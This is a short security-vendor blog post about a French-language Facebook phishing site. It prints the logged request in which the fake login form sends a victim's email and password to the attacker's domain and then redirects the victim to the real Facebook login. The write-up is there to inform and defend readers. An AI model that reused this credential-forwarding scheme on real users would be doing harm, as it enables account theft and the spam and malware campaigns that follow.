Site icon Panda Security Mediacenter

Facebook Phishing Site Targets French Users

Today I discovered a new Facebook phishing site targeting French users.  The login page looks identical to the official Facebook site, but the phishing site passes the victims credentials through a submission form before redirecting them to the official Facebook login site.

Source:

Connection:

(Passing the victims credentials over to the attacker)

GET hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&locale=fr_FR&email=victim@domain.com&pass=victimpass&pass_placeholder=Mot+de+passe&charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F

(Redirecting to the official Facebook login page)

302 Moved Temporarily to https://login.facebook.com/login.php

 

Even though this is a run of the mill phishing attack, we have noticed an uptrend of Phishing attacks especially in social networks.  The attackers can do many things with harvested accounts, but one of the most common is to harvest as many accounts as possible before unleashing mass spamvertising or even full blown malware campaigns.

 Tips to Avoid Phishing Attacks on Facebook [Facebook Blog]

Make sure that you have an up-to-date Anti-Malware solution running at all times to prevent Phishing and other types of malicious attacks.  

 

 

 

 
 

 

 

Exit mobile version